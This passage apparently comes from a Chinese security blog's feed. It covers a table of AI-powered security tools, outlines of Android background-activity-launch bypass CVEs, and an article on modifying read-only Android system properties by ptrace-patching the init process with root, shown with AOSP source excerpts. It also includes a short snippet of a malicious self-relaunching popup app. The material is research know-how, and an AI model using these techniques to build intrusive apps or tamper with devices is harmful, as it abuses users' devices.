&lt;td&gt;Gepetto&lt;/td&gt;
&lt;td&gt;IDA Pro插件，使用GPT模型对代码进行注释。&lt;/td&gt;
&lt;td&gt;辅助逆向工程。&lt;/td&gt;
&lt;td&gt;注释准确性依赖GPT理解。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gpt-wpre&lt;/td&gt;
&lt;td&gt;使用GPT-3进行全程序逆向工程。&lt;/td&gt;
&lt;td&gt;辅助逆向工程。&lt;/td&gt;
&lt;td&gt;效果依赖GPT-3能力。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G-3PO&lt;/td&gt;
&lt;td&gt;请求GPT-3对反编译代码进行注释。&lt;/td&gt;
&lt;td&gt;辅助理解代码。&lt;/td&gt;
&lt;td&gt;分析依赖GPT能力。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DevOpsGPT&lt;/td&gt;
&lt;td&gt;利用AI自动化软件开发流程，包括代码生成、测试等。&lt;/td&gt;
&lt;td&gt;自动化软件开发、提高效率、减少人为错误。&lt;/td&gt;
&lt;td&gt;依赖AI模型。可能有代码质量问题。需代码审查&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.6. 厂商AI&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;产品名称&lt;/th&gt;
&lt;th&gt;厂商&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Q-GPT安全机器人系统（QAX-GPT）&lt;/td&gt;
&lt;td&gt;奇安信&lt;/td&gt;
&lt;td&gt;基于大语言模型，模拟人类专家，实现告警研判、自动化调查、任务生成。&lt;/td&gt;
&lt;td&gt;大规模安全运营、自动化威胁响应。&lt;/td&gt;
&lt;td&gt;依赖大模型理解推理能力。效果受模型和数据影响。可能需定制化开发。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft 安全 Copilot&lt;/td&gt;
&lt;td&gt;微软&lt;/td&gt;
&lt;td&gt;AI网络安全产品，使安全人员快速响应威胁、处理信号、评估风险。&lt;/td&gt;
&lt;td&gt;威胁响应、风险评估、安全分析。&lt;/td&gt;
&lt;td&gt;依赖微软生态。可能存在数据隐私问题。效果依赖模型。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vulnerability detection by AI&lt;/td&gt;
&lt;td&gt;Offective 360&lt;/td&gt;
&lt;td&gt;AI解决方案，扫描源代码识别潜在漏洞。&lt;/td&gt;
&lt;td&gt;源代码安全审计、漏洞预防。&lt;/td&gt;
&lt;td&gt;效果依赖AI模型。可能存在误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firewall for AI&lt;/td&gt;
&lt;td&gt;Cloudflare&lt;/td&gt;
&lt;td&gt;AI防火墙，识别滥用和攻击。&lt;/td&gt;
&lt;td&gt;LLM应用安全防护。&lt;/td&gt;
&lt;td&gt;效果依赖识别算法。可能存在误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI-SPM&lt;/td&gt;
&lt;td&gt;Wiz&lt;/td&gt;
&lt;td&gt;AI安全态势管理产品，保护AI工具使用。&lt;/td&gt;
&lt;td&gt;AI开发安全、安全态势管理。&lt;/td&gt;
&lt;td&gt;针对AI开发场景，可能需与其他安全工具集成。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Burp GPT&lt;/td&gt;
&lt;td&gt;安吉斯网络&lt;/td&gt;
&lt;td&gt;Burp Suite扩展，集成GPT提高应用安全测试精度和效率。&lt;/td&gt;
&lt;td&gt;Web应用安全测试、漏洞发现。&lt;/td&gt;
&lt;td&gt;依赖GPT漏洞识别能力。可能存在误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NgSecGPT&lt;/td&gt;
&lt;td&gt;华云信安&lt;/td&gt;
&lt;td&gt;基于LLaMA系开源大模型，利用大规模网络安全数据集微调。&lt;/td&gt;
&lt;td&gt;网络安全任务&lt;/td&gt;
&lt;td&gt;开源性待验证。效果依赖模型和数据。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;360 安全大模型（目前没开源）&lt;/td&gt;
&lt;td&gt;360&lt;/td&gt;
&lt;td&gt;基于安全大数据和攻防实战经验研发的安全“中枢框架”，包含多个安全大模型。&lt;/td&gt;
&lt;td&gt;攻击检测、运营处置、知识管理、追踪溯源、代码安全、数据保护等。&lt;/td&gt;
&lt;td&gt;开源性待验证。效果依赖模型和数据。可能存在厂商锁定。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;StarShip SecScan&lt;/td&gt;
&lt;td&gt;OpenCSG&lt;/td&gt;
&lt;td&gt;基于大模型的软件安全防护方案，分析代码识别威胁和漏洞。&lt;/td&gt;
&lt;td&gt;源代码安全漏洞审查、第三方依赖包安全审查、IDE侧安全漏洞扫描。&lt;/td&gt;
&lt;td&gt;效果依赖AI模型。可能存在误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fortinet Advisor&lt;/td&gt;
&lt;td&gt;Fortinet&lt;/td&gt;
&lt;td&gt;生成式AI安全助手，加速威胁调查和修复，提高安全团队技能。&lt;/td&gt;
&lt;td&gt;威胁调查、修复、安全分析、报告生成。&lt;/td&gt;
&lt;td&gt;依赖Fortinet生态。效果依赖AI模型。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GenAI-Powered Security Tools&lt;/td&gt;
&lt;td&gt;Fortinet&lt;/td&gt;
&lt;td&gt;为Fortinet AI增加新维度，允许SecOps团队与AI交互。&lt;/td&gt;
&lt;td&gt;增强威胁检测、分析、响应、报告、剧本构建、修复。&lt;/td&gt;
&lt;td&gt;依赖Fortinet生态。效果依赖AI模型。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CrowdStrike Charlotte&lt;/td&gt;
&lt;td&gt;CrowdStrike&lt;/td&gt;
&lt;td&gt;自动执行任务，简化安全操作，实时响应威胁。&lt;/td&gt;
&lt;td&gt;自动化安全操作、威胁响应、安全分析。&lt;/td&gt;
&lt;td&gt;依赖CrowdStrike生态。效果依赖模型和数据集。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cortex® XSIAM平台&lt;/td&gt;
&lt;td&gt;Palo Alto Networks&lt;/td&gt;
&lt;td&gt;云交付的集成SOC平台，整合多个安全产品和功能，AI驱动。&lt;/td&gt;
&lt;td&gt;统一安全能力、威胁响应、安全自动化。&lt;/td&gt;
&lt;td&gt;依赖Palo Alto Networks生态。可能存在厂商锁定。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vectra Cognito平台&lt;/td&gt;
&lt;td&gt;Vectra&lt;/td&gt;
&lt;td&gt;自动化威胁检测和响应，提高SOC效率，威胁优先级排序。&lt;/td&gt;
&lt;td&gt;威胁检测、响应、优先级排序、安全分析。&lt;/td&gt;
&lt;td&gt;依赖Vectra生态。效果依赖AI引擎。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;天融信AI安全助手小天&lt;/td&gt;
&lt;td&gt;天融信&lt;/td&gt;
&lt;td&gt;基于天问大模型，智能分析客户行为、响应需求。&lt;/td&gt;
&lt;td&gt;客户服务、安全产品辅助、告警分析、处置建议。&lt;/td&gt;
&lt;td&gt;依赖天问大模型。效果依赖模型能力。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;启明星辰AI安全助手盘小古&lt;/td&gt;
&lt;td&gt;启明星辰&lt;/td&gt;
&lt;td&gt;基于AI的网络安全运营智能助手，提升运营效率和效果。&lt;/td&gt;
&lt;td&gt;安全运营、自动化运营、威胁分析。&lt;/td&gt;
&lt;td&gt;依赖AI安全智能体。效果依赖模型融合。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;网络安全LLM&lt;/td&gt;
&lt;td&gt;知道创宇&lt;/td&gt;
&lt;td&gt;基于攻防知识与安全GPT大模型融合的框架，该项目整合了多个针对不同任务的网络安全领域的LLMs&lt;/td&gt;
&lt;td&gt;自动化分析流量以及文本安全任务。&lt;/td&gt;
&lt;td&gt;该框架涉及知识库，需要注意幻觉效应&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.7. 7.LLM应用侧&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Wolverine&lt;/td&gt;
&lt;td&gt;自动修复 Python 代码中的错误。&lt;/td&gt;
&lt;td&gt;自动 debug，提高开发效率。&lt;/td&gt;
&lt;td&gt;可能存在误修复，或引入新的问题。需要人工审查修复结果。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;openai-cti-summarizer&lt;/td&gt;
&lt;td&gt;基于 LLM 生成威胁情报的总结。&lt;/td&gt;
&lt;td&gt;网络威胁情报 (CTI) 分析、安全报告和简报、安全事件响应、快速了解安全事件概况。&lt;/td&gt;
&lt;td&gt;准确性和可靠性依赖于 LLM 模型和 CTI 源数据质量。可能出现信息丢失、误解或偏差。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RagSecOps&lt;/td&gt;
&lt;td&gt;使用检索增强生成（RAG）模式构建的安全运营工具。&lt;/td&gt;
&lt;td&gt;威胁检测和事件响应、漏洞管理和补丁管理、安全自动化。&lt;/td&gt;
&lt;td&gt;准确性和误报率、计算资源消耗、数据隐私和安全问题、RAG 模型的检索质量和覆盖范围。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FlipLogGPT&lt;/td&gt;
&lt;td&gt;分析日志和向量存储进行安全分析。&lt;/td&gt;
&lt;td&gt;集成环境安全评估、安全事件调查、威胁狩猎。&lt;/td&gt;
&lt;td&gt;依赖日志质量和完整性。分析结果可能受限于向量存储的构建。存在被溯源的风险。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sovereign Chat&lt;/td&gt;
&lt;td&gt;集成多个 AI 模型，提供安全知识问答服务。&lt;/td&gt;
&lt;td&gt;快速获取安全知识、辅助安全决策、安全培训。&lt;/td&gt;
&lt;td&gt;回答的准确性和可靠性依赖于集成的 AI 模型。可能产生幻觉或误导性信息。需要专业知识复核。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ZenGuard AI&lt;/td&gt;
&lt;td&gt;低代码模型集成工具，用于构建具有安全防护的 LLM 应用。&lt;/td&gt;
&lt;td&gt;提高 LLM 应用的安全性，例如：及时注入检测、越狱检测、个人身份信息检测、关键字检测等。&lt;/td&gt;
&lt;td&gt;可能引入新的对抗攻击。依赖多个模型的集成和协同工作。对于新型攻击的防御能力可能有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Admyral&lt;/td&gt;
&lt;td&gt;开源网络安全自动化和调查助手，结合AI。&lt;/td&gt;
&lt;td&gt;自动化安全任务，辅助安全分析和调查。 可能包含自动化脚本执行，数据采集整合，可视化，以及LLM驱动的安全分析建议&lt;/td&gt;
&lt;td&gt;可能降低人工判断的重要性，需要平衡自动化与人工经验。AI分析的准确性、可靠性、可解释性需验证。可能需要根据具体场景进行定制化。&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/0SBm0N99ztl1CuvWaImHzQ&quot;&gt;【全文2.4万字】大模型注入攻击方法汇总&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://zhuanlan.zhihu.com/p/675509396&quot;&gt;一文读懂：大模型RAG（检索增强生成）含高级方法&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://keenlab.tencent.com/zh/2024/04/11/2024-SecCorpus0411/&quot;&gt;SecCorpus: 构建安全领域大模型数据的技术实践&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Android BAL Bypass攻击面分析</title><link>https://picoorg.github.io/posts/android-bal-bypass%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</link><guid isPermaLink="true">https://picoorg.github.io/posts/android-bal-bypass%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</guid><pubDate>Tue, 03 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Android BAL Bypass攻击面分析&lt;/h1&gt;
&lt;h2&gt;一、Android BAL&lt;/h2&gt;
&lt;p&gt;后台弹窗(&lt;code&gt;BAL, Background Activity Launch&lt;/code&gt;)在Android 10以前是被允许的，恶意APP利用这种特性，在用户正常使用手机时弹出，和PC端的桌面窗口广告类似，会覆盖整个屏幕或弹窗。比如在进入后台直接唤起自身，代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MainActivity extends Activity {
    ...

    @Override
    protected void onDestroy() {
        super.onDestroy();
        Intent intent = new Intent(getApplicationContext(), MainActivity.class);
        startActivity(intent);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href=&quot;https://developer.android.com/guide/components/activities/background-starts?hl=zh-cn&quot;&gt;Google&lt;/a&gt;在Android 10引入后台&lt;code&gt;Activity&lt;/code&gt;启动限制：Android 10（API 级别 29）及更高版本会限制应用何时可以启动&lt;code&gt;activity&lt;/code&gt;背景。这些限制有助于最大限度地减少对用户的干扰，让用户能够更好地控制其屏幕上显示的内容。但为了保障系统和部分应用功能，BAL在设计之初同时引入了一批白名单限制，这也给恶意应用带来了一些绕过限制的可能。&lt;/p&gt;
&lt;h3&gt;1.1 BAL限制逻辑&lt;/h3&gt;
&lt;p&gt;主要逻辑位于&lt;code&gt;WMS&lt;/code&gt;服务中的&lt;code&gt;ActivityStarter&lt;/code&gt;，具体代码在&lt;code&gt;platform/frameworks/base/services/core/java/com/android/server/wm/ActivityStarter.java&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;1.2 BAL白名单&lt;/h3&gt;
&lt;h2&gt;二、Bypass Case&lt;/h2&gt;
&lt;h3&gt;2.1 CVE-2023-40109&lt;/h3&gt;
&lt;p&gt;https://android.googlesource.com/platform/frameworks/base/+/387d258cf10a30537fc48dc0e48d28071efa92e7&lt;/p&gt;
&lt;h3&gt;2.2 CVE-2024-0034&lt;/h3&gt;
&lt;p&gt;https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6&lt;/p&gt;
&lt;h3&gt;2.3&lt;/h3&gt;
&lt;h2&gt;三、参考文献&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/hGx8FNjI37trnZehY839bQ&quot;&gt;恶意App后台弹窗技术手法分析&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.android.com/guide/components/activities/background-starts?hl=zh-cn&quot;&gt;针对从后台启动 activity 的限制&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://wrlus.com/android-security/bindservice-error-handle/&quot;&gt;BindService错误处理与CVE-2023-21138 &amp;amp; CVE-2023-40130&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.canyie.top/2024/04/18/android-security-bulletin-index/&quot;&gt;Android 每月安全补丁分析索引&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Android漏洞分析</title><link>https://picoorg.github.io/posts/android-framework%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</link><guid isPermaLink="true">https://picoorg.github.io/posts/android-framework%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</guid><pubDate>Wed, 15 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Android简介&lt;/h1&gt;
&lt;h1&gt;Android Binder&lt;/h1&gt;
&lt;h1&gt;Bundle mismatch&lt;/h1&gt;
&lt;h1&gt;LaunchAnyWhere&lt;/h1&gt;
&lt;h1&gt;Android WebView jsbridge&lt;/h1&gt;
&lt;h1&gt;参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://tech.meituan.com/2017/09/14/android-binde-kcon.html&quot;&gt;Android Binder漏洞挖掘技术与案例分享&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://colbert337.github.io/2015/08/24/android-attack-surface/&quot;&gt;Android Attack Surface&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>AndroidBox-01-修改SystemProperty</title><link>https://picoorg.github.io/posts/androidbox-01-%E4%BF%AE%E6%94%B9systemproperty/</link><guid isPermaLink="true">https://picoorg.github.io/posts/androidbox-01-%E4%BF%AE%E6%94%B9systemproperty/</guid><description>AndroidBox第一个模块，仅需root权限可修改任意SystemProperty。</description><pubDate>Wed, 15 Jan 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;1. 简介&lt;/h1&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/PicoOrg/AndroidBox&quot;&gt;Android项目地址&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在做&lt;code&gt;Android&lt;/code&gt;安全研究时，免不了对系统&lt;code&gt;build.prop&lt;/code&gt;属性进行修改。常见修改方法有:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;使用&lt;code&gt;mprop&lt;/code&gt;工具&lt;/li&gt;
&lt;li&gt;使用&lt;code&gt;magisk&lt;/code&gt;自带的命令&lt;code&gt;resetprop&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;安装&lt;code&gt;magisk&lt;/code&gt;或&lt;code&gt;kernelsu&lt;/code&gt;的相关模块&lt;/li&gt;
&lt;li&gt;手动修改&lt;code&gt;framework&lt;/code&gt;源码后编译&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;其中，方法1主要采用的是&lt;code&gt;init&lt;/code&gt;进程内存修改&lt;code&gt;bypass&lt;/code&gt;，方法2和4的原理都是对&lt;code&gt;framework&lt;/code&gt;源码进行修改，方法3根据模块不同有不同的原理。本文主要针对方法1展开分析。&lt;/p&gt;
&lt;h1&gt;2. 原理&lt;/h1&gt;
&lt;p&gt;在看雪大佬&lt;a href=&quot;https://bbs.kanxue.com/thread-246081.htm&quot;&gt;文章&lt;/a&gt;中，回复楼层出现了&lt;code&gt;mprop&lt;/code&gt;其他&lt;a href=&quot;https://gist.github.com/pinohans/96962ccc8708467ca319df9b5bbec57d&quot;&gt;实现代码&lt;/a&gt;。&lt;/p&gt;
&lt;p&gt;对&lt;code&gt;Android&lt;/code&gt;源码分析发现，设备对应&lt;code&gt;pixel7&lt;/code&gt;的&lt;code&gt;android14&lt;/code&gt;版本，设置属性函数&lt;code&gt;__system_property_set&lt;/code&gt;最终会调用到&lt;code&gt;init&lt;/code&gt;进程中的&lt;code&gt;property_service&lt;/code&gt;的&lt;code&gt;PropertySet&lt;/code&gt;函数，流程如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ndk __system_property_set

1 =&amp;gt; /system/lib64/libc.so
bionic/libc/bionic/system_property_set.cpp __system_property_set

2 =&amp;gt; /system/bin/init
system/core/init/property_service.cpp handle_property_set_fd

3 =&amp;gt; /system/bin/init
system/core/init/property_service.cpp HandlePropertySet()

4 =&amp;gt; /system/bin/init
system/core/init/property_service.cpp PropertySet

5 =&amp;gt; /system/lib64/bootstrap/libc.so
bionic/libc/bionic/system_property_api.cpp __system_property_update

6 =&amp;gt; /system/lib64/bootstrap/libc.so
bionic/libc/system_properties/system_properties.cpp SystemProperties::Update
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;调用&lt;code&gt;ndk&lt;/code&gt;函数&lt;code&gt;__system_property_set&lt;/code&gt;设置属性，会先判断&lt;code&gt;g_propservice_protocol_version&lt;/code&gt;值，根据版本调用不同发送方式，后文以&lt;code&gt;kProtocolVersion2&lt;/code&gt;为例。&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// bionic/libc/bionic/system_property_set.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:bionic/libc/bionic/system_property_set.cpp
__BIONIC_WEAK_FOR_NATIVE_BRIDGE
int __system_property_set(const char* key, const char* value) {
...
  if (g_propservice_protocol_version == kProtocolVersion1) { // g_propservice_protocol_version取ro.property_service.version值，大或等于2是kProtocolVersion2，否则是kProtocolVersion1
...
    prop_msg msg;
    memset(&amp;amp;msg, 0, sizeof msg);
    msg.cmd = PROP_MSG_SETPROP;
    strlcpy(msg.name, key, sizeof msg.name);
    strlcpy(msg.value, value, sizeof msg.value);

    return send_prop_msg(&amp;amp;msg);
  } else {
...
    PropertyServiceConnection connection(key);
...
    SocketWriter writer(&amp;amp;connection);
    if (!writer.WriteUint32(PROP_MSG_SETPROP2).WriteString(key).WriteString(value).Send()) {
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;system/core/init/property_service.cpp&lt;/code&gt;里函数&lt;code&gt;handle_property_set_fd&lt;/code&gt;处理&lt;code&gt;socket&lt;/code&gt;数据，进入&lt;code&gt;PROP_MSG_SETPROP2&lt;/code&gt;分支，接收数据后调用&lt;code&gt;HandlePropertySet&lt;/code&gt;函数&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// system/core/init/property_service.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:system/core/init/property_service.cpp
static void handle_property_set_fd(int fd) {
...
    int s = accept4(fd, nullptr, nullptr, SOCK_CLOEXEC);
...
    if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &amp;amp;cr, &amp;amp;cr_size) &amp;lt; 0) {
...
    SocketConnection socket(s, cr);
...
    if (!socket.RecvUint32(&amp;amp;cmd, &amp;amp;timeout_ms)) {
...
    switch (cmd) {
...
    case PROP_MSG_SETPROP2: {
        std::string name;
        std::string value;
        if (!socket.RecvString(&amp;amp;name, &amp;amp;timeout_ms) ||
            !socket.RecvString(&amp;amp;value, &amp;amp;timeout_ms)) {
...
        auto result = HandlePropertySet(name, value, source_context, cr, &amp;amp;socket, &amp;amp;error);
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在函数&lt;code&gt;HandlePropertySet&lt;/code&gt;处理权限校验及特殊系统属性，最后进入&lt;code&gt;PropertySet&lt;/code&gt;函数&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// system/core/init/property_service.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:system/core/init/property_service.cpp
std::optional&amp;lt;uint32_t&amp;gt; HandlePropertySet(const std::string&amp;amp; name, const std::string&amp;amp; value,
                                          const std::string&amp;amp; source_context, const ucred&amp;amp; cr,
                                          SocketConnection* socket, std::string* error) {
    if (auto ret = CheckPermissions(name, value, source_context, cr, error); ret != PROP_SUCCESS) {
...
    if (StartsWith(name, &quot;ctl.&quot;)) {
        return {SendControlMessage(name.c_str() + 4, value, cr.pid, socket, error)};
    }
... // 特殊处理sys.powerctl，其作用是设备重启，但目前userspace已经弃用了，aosp会记录设备关机的原因
... // 特殊处理selinux.restorecon_recursive，如果来自非init进程，且value不为空，触发异步恢复SELinux，如果来自init进程，会导致执行时间过长
    return PropertySet(name, value, socket, error);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在函数&lt;code&gt;PropertySet&lt;/code&gt;处理属性修改，如果&lt;code&gt;prop&lt;/code&gt;存在进行&lt;code&gt;__system_property_update&lt;/code&gt;修改，否则进行&lt;code&gt;__system_property_add&lt;/code&gt;添加&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// system/core/init/property_service.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:system/core/init/property_service.cpp
static std::optional&amp;lt;uint32_t&amp;gt; PropertySet(const std::string&amp;amp; name, const std::string&amp;amp; value,
                                           SocketConnection* socket, std::string* error) {
...
        prop_info* pi = (prop_info*)__system_property_find(name.c_str());
        if (pi != nullptr) {
            // ro.* properties are actually &quot;write-once&quot;.
            if (StartsWith(name, &quot;ro.&quot;)) { // ro属性校验
                *error = &quot;Read-only property was already set&quot;;
                return {PROP_ERROR_READ_ONLY_PROPERTY};
            }

            __system_property_update(pi, value.c_str(), valuelen);
        } else {
            int rc = __system_property_add(name.c_str(), name.size(), value.c_str(), valuelen);
            if (rc &amp;lt; 0) {
                *error = &quot;__system_property_add failed&quot;;
                return {PROP_ERROR_SET_FAILED};
            }
        }
... // 处理需要持久化的persist.和next_boot.属性，并进行属性修改通知
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;bionic/libc/bionic/system_property_api.cpp&lt;/code&gt;里函数&lt;code&gt;__system_property_update&lt;/code&gt;调用&lt;code&gt;SystemProperties::Update&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// bionic/libc/bionic/system_property_api.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:bionic/libc/bionic/system_property_api.cpp
static SystemProperties system_properties;
...
__BIONIC_WEAK_FOR_NATIVE_BRIDGE
int __system_property_update(prop_info* pi, const char* value, unsigned int len) {
  return system_properties.Update(pi, value, len);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;bionic/libc/system_properties/system_properties.cpp&lt;/code&gt;里函数&lt;code&gt;SystemProperties::Update&lt;/code&gt;最终将&lt;code&gt;value&lt;/code&gt;写入&lt;code&gt;prop_area&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// bionic/libc/system_properties/system_properties.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:bionic/libc/system_properties/system_properties.cpp
int SystemProperties::Update(prop_info* pi, const char* value, unsigned int len) {
...
  prop_area* pa = contexts_-&amp;gt;GetPropAreaForName(pi-&amp;gt;name);
  prop_area* override_pa =
      have_override ? appcompat_override_contexts_-&amp;gt;GetPropAreaForName(pi-&amp;gt;name) : nullptr;
...
  auto* override_pi = const_cast&amp;lt;prop_info*&amp;gt;(have_override ? override_pa-&amp;gt;find(pi-&amp;gt;name) : nullptr);
...
  memcpy(pa-&amp;gt;dirty_backup_area(), pi-&amp;gt;value, old_len + 1);
  if (have_override) {
    memcpy(override_pa-&amp;gt;dirty_backup_area(), override_pi-&amp;gt;value, old_len + 1);
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;3. 实现&lt;/h1&gt;
&lt;p&gt;一种比较暴力的思路，发现&lt;code&gt;init&lt;/code&gt;进程中，只有&lt;code&gt;PropertySet&lt;/code&gt;函数会校验&lt;code&gt;ro.&lt;/code&gt;属性，并且通过检索发现&lt;code&gt;init modules&lt;/code&gt;中只有一个位置包含字符串&lt;code&gt;ro.\x00&lt;/code&gt;于是：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;非&lt;code&gt;ro.&lt;/code&gt;属性：很简单，只要调用&lt;code&gt;__system_property_set&lt;/code&gt;；&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ro.&lt;/code&gt;属性：利用&lt;code&gt;ptrace&lt;/code&gt;的&lt;code&gt;Attach&lt;/code&gt;进程 -&amp;gt; &lt;code&gt;PeekData&lt;/code&gt;定位 -&amp;gt; &lt;code&gt;PokeData&lt;/code&gt;修改，篡改校验规则后调用&lt;code&gt;__system_property_set&lt;/code&gt;，在成功后恢复现场；&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;4. 其他细节&lt;/h1&gt;
&lt;p&gt;根据&lt;code&gt;baihong&lt;/code&gt;大佬提醒，&lt;code&gt;__system_property_set&lt;/code&gt;调用会产生痕迹，修改&lt;code&gt;/system_ext/etc/build.prop&lt;/code&gt;属性可能表现与&lt;code&gt;/system/build.prop&lt;/code&gt;不一致。&lt;/p&gt;
&lt;h2&gt;4.1. __system_property_set执行影响&lt;/h2&gt;
&lt;p&gt;根据提示位置&lt;code&gt;system/libbase/properties.cpp&lt;/code&gt;，代码在&lt;code&gt;/system/lib64/libbase.so&lt;/code&gt;，发现与「原理」章节流程中第6步不一致，实际未调用。但&lt;code&gt;serial&lt;/code&gt;值确实会增加：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// bionic/libc/system_properties/system_properties.cpp
// https://cs.android.com/android/platform/superproject/main/+/0aee4d97c97a87812f9764920f54b40de6958f1c:bionic/libc/system_properties/system_properties.cpp
